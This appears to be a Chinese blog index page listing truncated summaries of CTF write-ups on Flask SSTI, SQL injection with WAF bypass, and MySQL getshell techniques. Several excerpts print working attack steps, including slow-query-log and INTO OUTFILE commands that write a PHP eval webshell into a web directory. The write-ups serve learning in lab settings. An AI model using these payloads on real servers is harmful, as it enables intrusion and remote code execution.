摘要: 1. 进入题目可也看到有一个FlaskLight的提示,以及页面上显示你查询的和查询的结果字样。先查看源码发现提示内容:有一个get请求方式的参数search 2. 传递参数search并进行模板注入的测试,输入?search={{5*8}},页面输出表达式的结果,很好可以进行模板注入,回显点在Yo 阅读全文
posted @ 2020-10-29 13:16 二算i 阅读(1565) 评论(0) 推荐(1) 编辑
摘要: 1. 慢日志查询getshell show variables like '%slow%' set global slow_query_log=on; set global slow_query_log_file='E:/phpstudy_pro/WWW/slow.php' select '<?ph 阅读全文
posted @ 2020-10-28 19:26 二算i 阅读(621) 评论(0) 推荐(0) 编辑
摘要: 1.select into outfile直接写入webshell 查询文件写入路径的值 show global variables like '%secure%' 写入webshell select '<?php @eval($_POST[shell]);?>'INTO OUTFILE 'D:/p 阅读全文
posted @ 2020-10-27 22:06 二算i 阅读(923) 评论(0) 推荐(0) 编辑
摘要: 1. 注入点测试 a. 输入敏感字符 or、and、union、handler、from等字符串页面显示Nonono;有waf检测,不过这里没有过滤select、concat,可以使用BurpSuit测试一下。 b. 输入字符串 a、b、c、love等页面没有任何回显 c. 输入数字1,2,3,4, 阅读全文
posted @ 2020-10-25 21:34 二算i 阅读(437) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2020-10-25 21:33 二算i 阅读(74) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2020-10-22 22:10 二算i 阅读(151) 评论(0) 推荐(0) 编辑
摘要: #这里提一下,由于服务器可能会出现429太多请求的错误,会导致脚本测试某些字段匹配不到。建议多跑几次flag。#这题目里password字段太长了,建议直接从170位到220位测试(小心别踩坑,因为429错误)。import requests url = 'http://c3d4ded5-63fb- 阅读全文
posted @ 2020-10-21 20:59 二算i 阅读(297) 评论(0) 推荐(1) 编辑
摘要: 阅读全文
posted @ 2020-10-21 16:55 二算i 阅读(139) 评论(0) 推荐(0) 编辑
摘要: 1. Flask框架 Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。另外,Flask还有很强的定制性,用户可以根据 阅读全文
posted @ 2020-10-16 21:16 二算i 阅读(440) 评论(0) 推荐(0) 编辑
摘要: 1. SSTI模板注入(Server-side template injection) a. 服务器模板注入是当攻击者能够用本地的模板语法去注入一个恶意的payload,然后再服务器端执行改模板的攻击手法。 b. 模板引擎使用过将固定模板与多边数据结合起来生成的html网页的一种技术,当用户直接输入 阅读全文
posted @ 2020-10-16 21:14 二算i 阅读(450) 评论(0) 推荐(0) 编辑